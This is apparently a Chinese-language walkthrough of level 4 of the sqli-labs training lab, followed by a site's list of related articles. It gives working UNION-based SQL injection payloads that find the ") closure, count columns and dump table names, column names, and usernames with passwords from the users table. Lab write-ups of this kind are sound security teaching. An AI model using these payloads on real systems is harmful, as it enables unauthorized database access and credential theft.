sqli-labs---第四关

简介: sqli-labs---第四关

1、判断类型的注入

?id=1(正常回显)

?id=1'(正常回显)

?id=1"(报错)

可判断为字符型闭合,")为闭合方式

2、查询列数,判断回显位置

?id=1") order by 3 --+

?id=1") order by 4 --+

判断出有3列

?id=1") and 1=2 union select 1,2,3 --+

2,3位置有回显

3、查询数据库名(库名为security)

?id=1") and 1=2 union select 1,database(),3 --+

4、查询表名(有4张表,我们查询users这张表)


?id=1") and 1=2 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database(); --+  

5、查询users表中字段


?id=1") and 1=2 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'; --+  

6、查询用户名和密码字段的值 ,用id分隔开方便观看

?id=1") and 1=2 union select 1,database(),group_concat(username,id,password) from security.users --+

相关文章
|
Python
使用Python实现股票均线策略
使用Python实现股票均线策略案例的简单示例
511 2
|
SQL 关系型数据库 MySQL
大厂面试官:聊下 MySQL 慢查询优化、索引优化?
MySQL慢查询优化、索引优化,是必知必备,大厂面试高频,本文深入详解,建议收藏。关注【mikechen的互联网架构】,10年+BAT架构经验分享。
大厂面试官:聊下 MySQL 慢查询优化、索引优化?
|
安全 测试技术 数据库
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
|
人工智能 API
新年课程开启:手把手教学,0基础5次课程学会搭建无限拓展的AI应用
你是否想过自己也能动手搭建一个AI应用?现在,这个目标触手可及!
294 9
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
295 6
|
机器学习/深度学习 并行计算 Linux
环境安装(二):不同平台皆可安装Paddle
这篇文章介绍了如何在不同操作系统平台上安装PaddlePaddle,包括Windows和Linux,以及如何使用Paddle Lite在AMD64和ARM架构上部署模型,并提供了官方安装命令和进一步学习资源。
1046 0
|
安全 关系型数据库 MySQL
【sqli靶场】第六关和第七关通关思路
【sqli靶场】第六关和第七关通关思路
360 0
|
SQL 安全 数据处理
Web 测试神器:HackBar 保姆级教程
Web 测试神器:HackBar 保姆级教程
|
网络协议 数据安全/隐私保护
BUUCTF 基础破解 1
BUUCTF 基础破解 1
726 0
|
Python
Python中的反对称矩阵(Skew-Symmetric Matrices)
Python中的反对称矩阵(Skew-Symmetric Matrices)
672 2